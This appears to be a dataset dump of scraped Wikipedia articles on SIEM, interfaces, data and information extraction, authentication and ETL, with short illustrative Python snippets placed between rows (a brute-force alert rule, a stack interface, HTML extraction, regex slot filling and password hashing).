Employ the threat hunting capability Assignment: organization-defined frequency . NIST SP 800 53 R5 and the brief descriptions of AU 2, SI 4, and RA 10 depict how individual controls are all used as critical elements of the event, alerting and monitoring via a SIEM. 24 These controls, combined with other technical security controls provided by NIST, weave together an in-depth defense system. The assurance of the system security is enforced with various risk assessments and continuous monitoring - often enhanced or streamlined with a SIEM product used across entire cybersecurity teams. There are many more technical controls that outline specific items that must be monitored. The controls identified are a cursory overlook of controls directly related to the event and audit gathering functionality and use in a SIEM tool. The acronyms SEM, SIM and SIEM have sometimes been used interchangeably, 25 but generally refer to the different primary focus of products: In practice many products in this area will have a mix of these functions, so there will often be some overlap and many commercial vendors also promote their own terminology. 27 Oftentimes commercial vendors provide different combinations of these functionalities which tend to improve SIEM overall. Log management alone doesn't provide real-time insights on network security, SEM on its own won't provide complete data for deep threat analysis. When SEM and log management are combined, more information is available for SIEM to monitor. A key focus is to monitor and help manage user and service privileges, directory services and other clarification needed system-configuration changes; as well as providing log auditing and review and incident response. 26 SIEM architectures may vary by vendor; however, generally, essential components comprise the SIEM engine. The essential components of a SIEM are as follows: 31 A basic SIEM infrastructure is depicted in the image to the right. Computer security researcher Chris Kubecka identified the following SIEM use cases, presented at the hacking conference 28C3 (Chaos Communication Congress). 36 SIEM systems can have hundreds and thousands of correlation rules. Some of these are simple, and some are more complex. Once a correlation rule is triggered the system can take appropriate steps to mitigate a cyber attack. Usually, this includes sending a notification to a user and then possibly limiting or even shutting down the system. Brute force detection is relatively straightforward. Brute forcing relates to continually trying to guess a variable. It most commonly refers to someone trying to constantly guess your password - either manually or with a tool. However, it can refer to trying to guess URLs or important file locations on your system. An automated brute force is easy to detect as someone trying to enter their password 60 times in a minute is impossible. When a user logs in to a system, generally speaking, it creates a timestamp of the event. Alongside the time, the system may often record other useful information such as the device used, physical location, IP address, incorrect login attempts, etc. The more data is collected the more use can be gathered from it. For impossible travel, the system looks at the current and last login date time and the difference between the recorded distances. If it deems it's not possible for this to happen, for example traveling hundreds of miles within a minute, then it will set off a warning. 
Many employees and users now use VPN services, which may obscure their physical location; this should be taken into consideration when setting up such a rule. The average user does not typically copy or move files on the system repeatedly. Thus, any excessive file copying on a system could be attributed to an attacker wanting to cause harm to an organization. Unfortunately, it's not as simple as stating that someone has gained access to your network illegally and wants to steal confidential information. It could also be an employee looking to sell company information, or they could just want to take home some files for the weekend. A DDoS (Distributed Denial of Service) attack could cause significant damage to a company or organization. A DDoS attack can not only take a website offline, it can also make a system weaker. With suitable correlation rules in place, a SIEM should trigger an alert at the start of the attack so that the company can take the necessary precautionary measures to protect vital systems. File Integrity and Change Monitoring (FIM) is the process of monitoring the files on your system. Unexpected changes to your system files will trigger an alert, as they are a likely indication of a cyber attack. Alongside correlation rules, it's also possible for a SIEM to have models. Models differ somewhat from correlation rules but, if implemented correctly, can be just as useful. Instead of using a one-to-one correlation, a model requires a number of steps to happen in order to trigger an alert. This usually means a first-time rule followed by anomalous behavior. This can be as simple as a user logging in from a different location than usual and then carrying out a large file transfer. This can be extremely useful, as a single event does not necessarily mean a compromise of an organization's servers or network; it could just be a team member working from a café for a change of scenery. Unfortunately, false positives appear in all walks of life, and this holds true for SIEM. All tools and systems can produce a false-positive result. For example, too many failed login attempts can just be an employee forgetting their password rather than someone trying to break into the system. It's important that the steps taken for any triggered event are justified and proportionate, as you wouldn't want employees getting locked out for hours in such scenarios. 37 Some examples of customized rules that alert on event conditions involve user authentication rules, detected attacks, and detected infections. 38 |
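The brute-force and "impossible travel" examples in this record boil down to correlation rules evaluated over a stream of log events. Here is a minimal sketch of one such rule in Python, assuming a simplified event dictionary with timestamp, source_ip, and outcome fields and an arbitrary threshold of ten failures per minute; a real SIEM would express this in its own rule language and act on the alert automatically.

from collections import defaultdict, deque
from datetime import timedelta

FAILED_LOGIN_THRESHOLD = 10          # assumed threshold for this sketch
WINDOW = timedelta(minutes=1)        # assumed sliding window

class BruteForceRule:
    """Alert when one source IP produces too many failed logins within the window."""

    def __init__(self):
        self._failures = defaultdict(deque)   # source_ip -> timestamps of recent failures

    def process(self, event):
        # Expected event shape (an assumption for this sketch):
        # {"timestamp": datetime, "source_ip": str, "outcome": "success" or "failure"}
        if event["outcome"] != "failure":
            return None
        ts, ip = event["timestamp"], event["source_ip"]
        window = self._failures[ip]
        window.append(ts)
        while window and ts - window[0] > WINDOW:
            window.popleft()                  # drop failures that fell out of the window
        if len(window) >= FAILED_LOGIN_THRESHOLD:
            return f"ALERT: possible brute force from {ip} ({len(window)} failures in the last minute)"
        return None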
475 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Interface_(computing) | In computing, an interface is a shared boundary across which two or more separate components of a computer system exchange information. The exchange can be between software, computer hardware, peripheral devices, humans, and combinations of these. 1 Some computer hardware devices, such as a touchscreen, can both send and receive data through the interface, while others such as a mouse or microphone may only provide an interface to send data to a given system. 2 Hardware interfaces exist in many components, such as the various buses, storage devices, other I O devices, etc. A hardware interface is described by the mechanical, electrical, and logical signals at the interface and the protocol for sequencing them (sometimes called signaling). 3 A standard interface, such as SCSI, decouples the design and introduction of computing hardware, such as I O devices, from the design and introduction of other components of a computing system, thereby allowing users and manufacturers great flexibility in the implementation of computing systems. 3 Hardware interfaces can be parallel with several electrical connections carrying parts of the data simultaneously or serial where data are sent one bit at a time. 4 A software interface may refer to a wide range of different types of interfaces at different "levels". For example, an operating system may interface with pieces of hardware. Applications or programs running on the operating system may need to interact via data streams, filters, and pipelines. 5 In object oriented programs, objects within an application may need to interact via methods. 6 A key principle of design is to prohibit access to all resources by default, allowing access only through well-defined entry points, i.e., interfaces. 7 Software interfaces provide access to computer resources (such as memory, CPU, storage, etc.) of the underlying computer system; direct access (i.e., not through well-designed interfaces) to such resources by software can have major ramifications—sometimes disastrous ones—for functionality and stability. citation needed Interfaces between software components can provide constants, data types, types of procedures, exception specifications, and method signatures. Sometimes, public variables are also defined as part of an interface. 8 The interface of a software module A is deliberately defined separately from the implementation of that module. The latter contains the actual code of the procedures and methods described in the interface, as well as other "private" variables, procedures, etc. Another software module B, for example the client to A, that interacts with A is forced to do so only through the published interface. One practical advantage of this arrangement is that replacing the implementation of A with another implementation of the same interface should not cause B to fail—how A internally meets the requirements of the interface is not relevant to B, which is only concerned with the specifications of the interface. (See also Liskov substitution principle.) citation needed In some object-oriented languages, especially those without full multiple inheritance, the term interface is used to define an abstract type that acts as an abstraction of a class. It contains no data, but defines behaviours as method signatures. A class having code and data for all the methods corresponding to that interface and declaring so is said to implement that interface. 
9 Furthermore, even in single-inheritance-languages, one can implement multiple interfaces, and hence can be of different types at the same time. 10 An interface is thus a type definition; anywhere an object can be exchanged (for example, in a function or method call) the type of the object to be exchanged can be defined in terms of one of its implemented interfaces or base-classes rather than specifying the specific class. This approach means that any class that implements that interface can be used. citation needed For example, a dummy implementation may be used to allow development to progress before the final implementation is available. In another case, a fake or mock implementation may be substituted during testing. Such stub implementations are replaced by real code later in the development process. Usually, a method defined in an interface contains no code and thus cannot itself be called; it must be implemented by non-abstract code to be run when it is invoked. citation needed An interface called "Stack" might define two methods: push() and pop(). It can be implemented in different ways, for example, FastStack and GenericStack—the first being fast, working with a data structure of fixed size, and the second using a data structure that can be resized, but at the cost of somewhat lower speed. Though interfaces can contain many methods, they may contain only one or even none at all. For example, the Java language defines the interface Readable that has the single read() method; various implementations are used for different purposes, including BufferedReader, FileReader, InputStreamReader, PipedReader, and StringReader. Marker interfaces like Serializable contain no methods at all and serve to provide run-time information to generic processing using Reflection. 11 The use of interfaces allows for a programming style called programming to the interface. The idea behind this approach is to base programming logic on the interfaces of the objects used, rather than on internal implementation details. Programming to the interface reduces dependency on implementation specifics and makes code more reusable. 12 Pushing this idea to the extreme, inversion of control leaves the context to inject the code with the specific implementations of the interface that will be used to perform the work. A user interface is a point of interaction between a computer and humans; it includes any number of modalities of interaction (such as graphics, sound, position, movement, etc.) where data is transferred between the user and the computer system. |
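The Stack example in this record translates directly into code. The sketch below uses Python's abc module to model the interface, with FastStack and GenericStack as the two implementations the passage describes; the fixed capacity, the backing storage, and the reverse() helper are illustrative assumptions chosen only to show "programming to the interface".

from abc import ABC, abstractmethod

class Stack(ABC):
    """The 'Stack' interface from the passage: two methods, no data."""

    @abstractmethod
    def push(self, item): ...

    @abstractmethod
    def pop(self): ...

class FastStack(Stack):
    """Fixed-capacity variant; the capacity and storage details are assumptions."""

    def __init__(self, capacity=16):
        self._items = [None] * capacity
        self._top = 0

    def push(self, item):
        if self._top == len(self._items):
            raise OverflowError("FastStack is full")
        self._items[self._top] = item
        self._top += 1

    def pop(self):
        if self._top == 0:
            raise IndexError("pop from empty FastStack")
        self._top -= 1
        return self._items[self._top]

class GenericStack(Stack):
    """Resizable variant backed by a Python list, trading some speed for flexibility."""

    def __init__(self):
        self._items = []

    def push(self, item):
        self._items.append(item)

    def pop(self):
        return self._items.pop()

def reverse(items, stack: Stack):
    """Programming to the interface: works with any Stack implementation."""
    for item in items:
        stack.push(item)
    return [stack.pop() for _ in items]

print(reverse([1, 2, 3], FastStack()))     # [3, 2, 1]
print(reverse([1, 2, 3], GenericStack()))  # [3, 2, 1]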
476 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Help:Introduction | Wikipedia is made by people like you. |
477 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Data_extraction | Data extraction is the act or process of retrieving data out of (usually unstructured or poorly structured) data sources for further data processing or data storage (data migration). The import into the intermediate extracting system is thus usually followed by data transformation and possibly the addition of metadata prior to export to another stage in the data workflow. Usually, the term data extraction is applied when (experimental) data is first imported into a computer from primary sources, like measuring or recording devices. Today's electronic devices will usually present an electrical connector (e.g. USB) through which 'raw data' can be streamed into a personal computer. Typical unstructured data sources include web pages, emails, documents, PDFs, social media, scanned text, mainframe reports, spool files, multimedia files, etc. Extracting data from these unstructured sources has grown into a considerable technical challenge: whereas historically data extraction had to deal with changes in physical hardware formats, the majority of current data extraction deals with unstructured data sources and with differing software formats. This growing practice of data extraction from the web is referred to as "Web data extraction" or "Web scraping". The act of adding structure to unstructured data takes a number of forms. |
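As a concrete illustration of web data extraction, the sketch below adds structure to a small, invented HTML fragment using BeautifulSoup and pandas (both installed earlier in this document); the markup, CSS selectors, and column names are assumptions made for the example.

from bs4 import BeautifulSoup
import pandas as pd

# A tiny, made-up HTML fragment standing in for an "unstructured" source.
html = """
<ul class="catalog">
  <li><a href="/item/1">Widget</a> <span class="price">$9.99</span></li>
  <li><a href="/item/2">Gadget</a> <span class="price">$19.50</span></li>
</ul>
"""

soup = BeautifulSoup(html, "html5lib")
rows = []
for li in soup.select("ul.catalog li"):
    rows.append({
        "name": li.a.get_text(strip=True),
        "url": li.a["href"],
        "price": li.select_one("span.price").get_text(strip=True),
    })

df = pd.DataFrame(rows)   # the unstructured markup is now tabular, ready for analysis
print(df)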
478 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Information_extraction | Information extraction (IE) is the task of automatically extracting structured information from unstructured and or semi-structured machine-readable documents and other electronically represented sources. Typically, this involves processing human language texts by means of natural language processing (NLP). 1 Recent activities in multimedia document processing like automatic annotation and content extraction out of images audio video documents could be seen as information extraction. Recent advances in NLP techniques have allowed for significantly improved performance compared to previous years. 2 An example is the extraction from newswire reports of corporate mergers, such as denoted by the formal relation: from an online news sentence such as: A broad goal of IE is to allow computation to be done on the previously unstructured data. A more specific goal is to allow automated reasoning about the logical form of the input data. Structured data is semantically well-defined data from a chosen target domain, interpreted with respect to category and context. Information extraction is the part of a greater puzzle which deals with the problem of devising automatic methods for text management, beyond its transmission, storage and display. The discipline of information retrieval (IR) 3 has developed automatic methods, typically of a statistical flavor, for indexing large document collections and classifying documents. Another complementary approach is that of natural language processing (NLP) which has solved the problem of modelling human language processing with considerable success when taking into account the magnitude of the task. In terms of both difficulty and emphasis, IE deals with tasks in between both IR and NLP. In terms of input, IE assumes the existence of a set of documents in which each document follows a template, i.e. describes one or more entities or events in a manner that is similar to those in other documents but differing in the details. An example, consider a group of newswire articles on Latin American terrorism with each article presumed to be based upon one or more terroristic acts. We also define for any given IE task a template, which is a(or a set of) case frame(s) to hold the information contained in a single document. For the terrorism example, a template would have slots corresponding to the perpetrator, victim, and weapon of the terroristic act, and the date on which the event happened. An IE system for this problem is required to "understand" an attack article only enough to find data corresponding to the slots in this template. Information extraction dates back to the late 1970s in the early days of NLP. 4 An early commercial system from the mid 1980s was JASPER built for Reuters by the Carnegie Group Inc with the aim of providing real-time financial news to financial traders. 5 Beginning in 1987, IE was spurred by a series of Message Understanding Conferences. MUC is a competition-based conference 6 that focused on the following domains: Considerable support came from the U.S. Defense Advanced Research Projects Agency (DARPA), who wished to automate mundane tasks performed by government analysts, such as scanning newspapers for possible links to terrorism. citation needed The present significance of IE pertains to the growing amount of information available in unstructured form. 
Tim Berners-Lee, inventor of the World Wide Web, refers to the existing Internet as the web of documents 7 and advocates that more of the content be made available as a web of data. 8 Until this transpires, the web largely consists of unstructured documents lacking semantic metadata. Knowledge contained within these documents can be made more accessible for machine processing by means of transformation into relational form, or by marking-up with XML tags. An intelligent agent monitoring a news data feed requires IE to transform unstructured data into something that can be reasoned with. A typical application of IE is to scan a set of documents written in a natural language and populate a database with the information extracted. 9 Applying information extraction to text is linked to the problem of text simplification in order to create a structured view of the information present in free text. The overall goal being to create a more easily machine-readable text to process the sentences. Typical IE tasks and subtasks include: Note that this list is not exhaustive and that the exact meaning of IE activities is not commonly accepted and that many approaches combine multiple sub-tasks of IE in order to achieve a wider goal. Machine learning, statistical analysis and or natural language processing are often used in IE. IE on non-text documents is becoming an increasingly interesting topic when? in research, and information extracted from multimedia documents can now when? be expressed in a high level structure as it is done on text. This naturally leads to the fusion of extracted information from multiple kinds of documents and sources. IE has been the focus of the MUC conferences. The proliferation of the Web, however, intensified the need for developing IE systems that help people to cope with the enormous amount of data that are available online. Systems that perform IE from online text should meet the requirements of low cost, flexibility in development and easy adaptation to new domains. MUC systems fail to meet those criteria. Moreover, linguistic analysis performed for unstructured text does not exploit the HTML XML tags and the layout formats that are available in online texts. As a result, less linguistically intensive approaches have been developed for IE on the Web using wrappers, which are sets of highly accurate rules that extract a particular page's content. Manually developing wrappers has proved to be a time-consuming task, requiring a high level of expertise. Machine learning techniques, either supervised or unsupervised, have been used to induce such rules automatically. Wrappers typically handle highly structured collections of web pages, such as product catalogs and telephone directories. They fail, however, when the text type is less structured, which is also common on the Web. Recent effort on adaptive information extraction motivates the development of IE systems that can handle different types of text, from well-structured to almost free text -where common wrappers fail- including mixed types. Such systems can exploit shallow natural language knowledge and thus can be also applied to less structured texts. A recent when? development is Visual Information Extraction, 16 17 that relies on rendering a webpage in a browser and creating rules based on the proximity of regions in the rendered web page. This helps in extracting entities from complex web pages that may exhibit a visual pattern, but lack a discernible pattern in the HTML source code. 
A number of standard approaches are now widely accepted, and numerous other approaches exist for IE, including hybrid approaches that combine several of the standard ones. |
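To make the template-filling idea concrete, here is a toy, rule-based extractor for the corporate-merger example mentioned in this record. The sentence and the regular expression are invented for illustration; production IE systems rely on statistical NLP or learned extractors rather than a single hand-written pattern.

import re

# Fill the slots of a hypothetical MERGER template (acquirer, target, amount).
sentence = "Acme Corp announced it will acquire Widget Ltd for $1.2 billion."

pattern = re.compile(
    r"(?P<acquirer>[A-Z]\w*(?:\s[A-Z][\w.]*)*)\s+announced it will acquire\s+"
    r"(?P<target>[A-Z]\w*(?:\s[A-Z][\w.]*)*)\s+for\s+(?P<amount>\$[\d.]+\s?\w*)"
)

match = pattern.search(sentence)
if match:
    record = match.groupdict()   # structured output from unstructured text
    print(record)                # {'acquirer': 'Acme Corp', 'target': 'Widget Ltd', 'amount': '$1.2 billion'}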
479 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Authentication | Authentication (from Greek: authentikos, "real, genuine", from authentes, "author") is the act of proving an assertion, such as the identity of a computer system user. In contrast with identification, the act of indicating a person or thing's identity, authentication is the process of verifying that identity. 1 It might involve validating personal identity documents, verifying the authenticity of a website with a digital certificate, 2 determining the age of an artifact by carbon dating, or ensuring that a product or document is not counterfeit. Authentication is relevant to multiple fields. In art, antiques, and anthropology, a common problem is verifying that a given artifact was produced by a certain person or in a certain place or period of history. In computer science, verifying a user's identity is often required to allow access to confidential data or systems. 3 Authentication can be considered to be of three types: The first type of authentication is accepting proof of identity given by a credible person who has first-hand evidence that the identity is genuine. When authentication is required of art or physical objects, this proof could be a friend, family member, or colleague attesting to the item's provenance, perhaps by having witnessed the item in its creator's possession. With autographed sports memorabilia, this could involve someone attesting that they witnessed the object being signed. A vendor selling branded items implies authenticity, while they may not have evidence that every step in the supply chain was authenticated. Centralized authority-based trust relationships back most secure internet communication through known public certificate authorities; decentralized peer-based trust, also known as a web of trust, is used for personal services such as email or files and trust is established by known individuals signing each other's cryptographic key for instance. The second type of authentication is comparing the attributes of the object itself to what is known about objects of that origin. For example, an art expert might look for similarities in the style of painting, check the location and form of a signature, or compare the object to an old photograph. An archaeologist, on the other hand, might use carbon dating to verify the age of an artifact, do a chemical and spectroscopic analysis of the materials used, or compare the style of construction or decoration to other artifacts of similar origin. The physics of sound and light, and comparison with a known physical environment, can be used to examine the authenticity of audio recordings, photographs, or videos. Documents can be verified as being created on ink or paper readily available at the time of the item's implied creation. Attribute comparison may be vulnerable to forgery. In general, it relies on the facts that creating a forgery indistinguishable from a genuine artifact requires expert knowledge, that mistakes are easily made, and that the amount of effort required to do so is considerably greater than the amount of profit that can be gained from the forgery. In art and antiques, certificates are of great importance for authenticating an object of interest and value. Certificates can, however, also be forged, and the authentication of these poses a problem. For instance, the son of Han van Meegeren, the well-known art-forger, forged the work of his father and provided a certificate for its provenance as well. 
Criminal and civil penalties for fraud, forgery, and counterfeiting can reduce the incentive for falsification, depending on the risk of getting caught. Currency and other financial instruments commonly use this second type of authentication method. Bills, coins, and cheques incorporate hard-to-duplicate physical features, such as fine printing or engraving, distinctive feel, watermarks, and holographic imagery, which are easy for trained receivers to verify. The third type of authentication relies on documentation or other external affirmations. In criminal courts, the rules of evidence often require establishing the chain of custody of evidence presented. This can be accomplished through a written evidence log, or by testimony from the police detectives and forensics staff that handled it. Some antiques are accompanied by certificates attesting to their authenticity. Signed sports memorabilia is usually accompanied by a certificate of authenticity. These external records have their own problems of forgery and perjury and are also vulnerable to being separated from the artifact and lost. In computer science, a user can be given access to secure systems based on user credentials that imply authenticity. 4 A network administrator can give a user a password, or provide the user with a key card or other access devices to allow system access. In this case, authenticity is implied but not guaranteed. Consumer goods such as pharmaceuticals, perfume, and clothing can use all forms of authentication to prevent counterfeit goods from taking advantage of a popular brand's reputation. As mentioned above, having an item for sale in a reputable store implicitly attests to it being genuine, the first type of authentication. The second type of authentication might involve comparing the quality and craftsmanship of an item, such as an expensive handbag, to genuine articles. The third type of authentication could be the presence of a trademark on the item, which is a legally protected marking, or any other identifying feature which aids consumers in the identification of genuine brand-name goods. With software, companies have taken great steps to protect from counterfeiters, including adding holograms, security rings, security threads and color shifting ink. 5 The ways in which someone may be authenticated fall into three categories, based on what is known as the factors of authentication: something the user knows, something the user has, and something the user is. Each authentication factor covers a range of elements used to authenticate or verify a person's identity before being granted access, approving a transaction request, signing a document or other work product, granting authority to others, and establishing a chain of authority. Security research has determined that for a positive authentication, elements from at least two, and preferably all three, factors should be verified. 6 The three factors (classes) and some of the elements of each factor are: As the weakest level of authentication, only a single component from one of the three categories of factors is used to authenticate an individual's identity. The use of only one factor does not offer much protection from misuse or malicious intrusion. This type of authentication is not recommended for financial or personally relevant transactions that warrant a higher level of security. 2 Multi-factor authentication involves two or more authentication factors (something you know, something you have, or something you are). 
Two-factor authentication is a special case of multi-factor authentication involving exactly two factors. 2 For example, using a bank card (something the user has) along with a PIN (something the user knows) provides two-factor authentication. Business networks may require users to provide a password (knowledge factor) and a pseudorandom number from a security token (ownership factor). Access to a very-high-security system might require a mantrap screening of height, weight, facial, and fingerprint checks (several inherence factor elements) plus a PIN and a day code (knowledge factor elements), but this is still a two-factor authentication. The United States government's National Information Assurance Glossary defines strong authentication as a layered authentication approach relying on two or more authenticators to establish the identity of an originator or receiver of information. 7 The European Central Bank (ECB) has defined strong authentication as "a procedure based on two or more of the three authentication factors". The factors that are used must be mutually independent and at least one factor must be "non-reusable and non-replicable", except in the case of an inherence factor and must also be incapable of being stolen off the Internet. In the European, as well as in the US-American understanding, strong authentication is very similar to multi-factor authentication or 2FA, but exceeding those with more rigorous requirements. 2 8 The FIDO Alliance has been striving to establish technical specifications for strong authentication. 9 Conventional computer systems authenticate users only at the initial log-in session, which can be the cause of a critical security flaw. To resolve this problem, systems need continuous user authentication methods that continuously monitor and authenticate users based on some biometric trait(s). A study used behavioural biometrics based on writing styles as a continuous authentication method. 10 11 Recent research has shown the possibility of using smartphones sensors and accessories to extract some behavioral attributes such as touch dynamics, keystroke dynamics and gait recognition. 12 These attributes are known as behavioral biometrics and could be used to verify or identify users implicitly and continuously on smartphones. The authentication systems that have been built based on these behavioral biometric traits are known as active or continuous authentication systems. 13 11 The term digital authentication, also known as electronic authentication or e-authentication, refers to a group of processes where the confidence for user identities is established and presented via electronic methods to an information system. The digital authentication process creates technical challenges because of the need to authenticate individuals or entities remotely over a network. The American National Institute of Standards and Technology (NIST) has created a generic model for digital authentication that describes the processes that are used to accomplish secure authentication: The authentication of information can pose special problems with electronic communication, such as vulnerability to man-in-the-middle attacks, whereby a third party taps into the communication stream, and poses as each of the two other communicating parties, in order to intercept information from each. Extra identity factors can be required to authenticate each party's identity. Counterfeit products are often offered to consumers as being authentic. 
Counterfeit consumer goods, such as electronics, music, apparel, and counterfeit medications, have been sold as being legitimate. Efforts to control the supply chain and educate consumers help ensure that authentic products are sold and used. Even security printing on packages, labels, and nameplates, however, is subject to counterfeiting. 15 In their anti-counterfeiting technology guide, 16 the EUIPO Observatory on Infringements of Intellectual Property Rights categorizes the main anti-counterfeiting technologies on the market currently into five main categories: electronic, marking, chemical and physical, mechanical, and technologies for digital media. 17 Products or their packaging can include a variable QR Code. A QR Code alone is easy to verify but offers a weak level of authentication as it offers no protection against counterfeits unless scan data is analyzed at the system level to detect anomalies. 18 To increase the security level, the QR Code can be combined with a digital watermark or copy detection pattern that are robust to copy attempts and can be authenticated with a smartphone. A secure key storage device can be used for authentication in consumer electronics, network authentication, license management, supply chain management, etc. Generally, the device to be authenticated needs some sort of wireless or wired digital connection to either a host system or a network. Nonetheless, the component being authenticated need not be electronic in nature as an authentication chip can be mechanically attached and read through a connector to the host e.g. an authenticated ink tank for use with a printer. For products and services that these secure coprocessors can be applied to, they can offer a solution that can be much more difficult to counterfeit than most other options while at the same time being more easily verified. 1 Packaging and labeling can be engineered to help reduce the risks of counterfeit consumer goods or the theft and resale of products. 19 20 Some package constructions are more difficult to copy and some have pilfer indicating seals. Counterfeit goods, unauthorized sales (diversion), material substitution and tampering can all be reduced with these anti-counterfeiting technologies. Packages may include authentication seals and use security printing to help indicate that the package and contents are not counterfeit; these too are subject to counterfeiting. Packages also can include anti-theft devices, such as dye-packs, RFID tags, or electronic article surveillance 21 tags that can be activated or detected by devices at exit points and require specialized tools to deactivate. Anti-counterfeiting technologies that can be used with packaging include: Literary forgery can involve imitating the style of a famous author. If an original manuscript, typewritten text, or recording is available, then the medium itself (or its packaging anything from a box to e-mail headers) can help prove or disprove the authenticity of the document. However, text, audio, and video can be copied into new media, possibly leaving only the informational content itself to use in authentication. Various systems have been invented to allow authors to provide a means for readers to reliably authenticate that a given message originated from or was relayed by them. These involve authentication factors like: The opposite problem is the detection of plagiarism, where information from a different author is passed off as a person's own work. 
A common technique for proving plagiarism is the discovery of another copy of the same or very similar text, which has different attribution. In some cases, excessively high quality or a style mismatch may raise suspicion of plagiarism. In literacy, authentication is a readers’ process of questioning the veracity of an aspect of literature and then verifying those questions via research. The fundamental question for authentication of literature is Does one believe it? Related to that, an authentication project is therefore a reading and writing activity in which students document the relevant research process ( 22 ). It builds students' critical literacy. The documentation materials for literature go beyond narrative texts and likely include informational texts, primary sources, and multimedia. The process typically involves both internet and hands-on library research. When authenticating historical fiction in particular, readers consider the extent that the major historical events, as well as the culture portrayed (e.g., the language, clothing, food, gender roles), are believable for the period. 3 Historically, fingerprints have been used as the most authoritative method of authentication, but court cases in the US and elsewhere have raised fundamental doubts about fingerprint reliability. 23 Outside of the legal system as well, fingerprints are easily spoofable, with British Telecom's top computer security official noting that "few" fingerprint readers have not already been tricked by one spoof or another. 24 Hybrid or two-tiered authentication methods offer a compelling according to whom? solution, such as private keys encrypted by fingerprint inside of a USB device. In a computer data context, cryptographic methods have been developed which are not spoofable if the originator's key has not been compromised. That the originator (or anyone other than an attacker) knows (or doesn't know) about a compromise is irrelevant. However, it is not known whether these cryptographically based authentication methods are provably secure, since unanticipated mathematical developments may make them vulnerable to attack in the future. If that were to occur, it may call into question much of the authentication in the past. In particular, a digitally signed contract may be questioned when a new attack on the cryptography underlying the signature is discovered. citation needed The process of authorization is distinct from that of authentication. Whereas authentication is the process of verifying that "you are who you say you are", authorization is the process of verifying that "you are permitted to do what you are trying to do". While authorization often happens immediately after authentication (e.g., when logging into a computer system), this does not mean authorization presupposes authentication: an anonymous agent could be authorized to a limited action set. 25 One familiar use of authentication and authorization is access control. A computer system that is supposed to be used only by those authorized must attempt to detect and exclude the unauthorized. Access to it is therefore usually controlled by insisting on an authentication procedure to establish with some degree of confidence the identity of the user, granting privileges established for that identity. |
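As a small illustration of verifying a knowledge factor ("something the user knows"), the sketch below stores and checks a salted, iterated password hash using only the Python standard library. The iteration count and salt size are assumptions for the example rather than recommendations drawn from this record, and a real deployment would combine this with additional factors as the text describes.

import hashlib
import hmac
import os

ITERATIONS = 600_000   # assumed work factor for this sketch

def hash_password(password):
    """Derive a salted hash suitable for storage (never store the plaintext)."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password, salt, expected):
    """Re-derive the hash and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, expected)

salt, stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, stored))  # True
print(verify_password("guess", salt, stored))                         # False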
480 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Extract,_transform,_load | In computing, extract, transform, load (ETL) is a three-phase process where data is extracted from an input source, transformed (including cleaning), and loaded into an output data container. The data can be collated from one or more sources and it can also be output to one or more destinations. ETL processing is typically executed using software applications but it can also be done manually by system operators. ETL software typically automates the entire process and can be run manually or on recurring schedules either as single jobs or aggregated into a batch of jobs. A properly designed ETL system extracts data from source systems and enforces data type and data validity standards and ensures it conforms structurally to the requirements of the output. Some ETL systems can also deliver data in a presentation-ready format so that application developers can build applications and end users can make decisions. 1 The ETL process is often used in data warehousing. 2 ETL systems commonly integrate data from multiple applications (systems), typically developed and supported by different vendors or hosted on separate computer hardware. The separate systems containing the original data are frequently managed and operated by different stakeholders. For example, a cost accounting system may combine data from payroll, sales, and purchasing. Data extraction involves extracting data from homogeneous or heterogeneous sources; data transformation processes data by data cleaning and transforming it into a proper storage format structure for the purposes of querying and analysis; finally, data loading describes the insertion of data into the final target database such as an operational data store, a data mart, data lake or a data warehouse. 3 4 ETL processing involves extracting the data from the source system(s). In many cases, this represents the most important aspect of ETL, since extracting data correctly sets the stage for the success of subsequent processes. Most data-warehousing projects combine data from different source systems. Each separate system may also use a different data organization and or format. Common data-source formats include relational databases, flat-file databases, XML, and JSON, but may also include non-relational database structures such as IBM Information Management System or other data structures such as Virtual Storage Access Method (VSAM) or Indexed Sequential Access Method (ISAM), or even formats fetched from outside sources by means such as a web crawler or data scraping. The streaming of the extracted data source and loading on-the-fly to the destination database is another way of performing ETL when no intermediate data storage is required. An intrinsic part of the extraction involves data validation to confirm whether the data pulled from the sources has the correct expected values in a given domain (such as a pattern default or list of values). If the data fails the validation rules, it is rejected entirely or in part. The rejected data is ideally reported back to the source system for further analysis to identify and to rectify incorrect records or perform data wrangling. In the data transformation stage, a series of rules or functions are applied to the extracted data in order to prepare it for loading into the end target. An important function of transformation is data cleansing, which aims to pass only "proper" data to the target. 
The challenge when different systems interact is in the relevant systems' interfacing and communicating. Character sets that may be available in one system may not be so in others. In other cases, one or more of the following transformation types may be required to meet the business and technical needs of the server or data warehouse: The load phase loads the data into the end target, which can be any data store including a simple delimited flat file or a data warehouse. Depending on the requirements of the organization, this process varies widely. Some data warehouses may overwrite existing information with cumulative information; updating extracted data is frequently done on a daily, weekly, or monthly basis. Other data warehouses (or even other parts of the same data warehouse) may add new data in a historical form at regular intervals — for example, hourly. To understand this, consider a data warehouse that is required to maintain sales records of the last year. This data warehouse overwrites any data older than a year with newer data. However, the entry of data for any one year window is made in a historical manner. The timing and scope to replace or append are strategic design choices dependent on the time available and the business needs. More complex systems can maintain a history and audit trail of all changes to the data loaded in the data warehouse. As the load phase interacts with a database, the constraints defined in the database schema — as well as in triggers activated upon data load — apply (for example, uniqueness, referential integrity, mandatory fields), which also contribute to the overall data quality performance of the ETL process. The typical real-life ETL cycle consists of the following execution steps: ETL processes can involve considerable complexity, and significant operational problems can occur with improperly designed ETL systems. The range of data values or data quality in an operational system may exceed the expectations of designers at the time validation and transformation rules are specified. Data profiling of a source during data analysis can identify the data conditions that must be managed by transform rules specifications, leading to an amendment of validation rules explicitly and implicitly implemented in the ETL process. Data warehouses are typically assembled from a variety of data sources with different formats and purposes. As such, ETL is a key process to bring all the data together in a standard, homogeneous environment. Design analysis 5 should establish the scalability of an ETL system across the lifetime of its usage — including understanding the volumes of data that must be processed within service level agreements. The time available to extract from source systems may change, 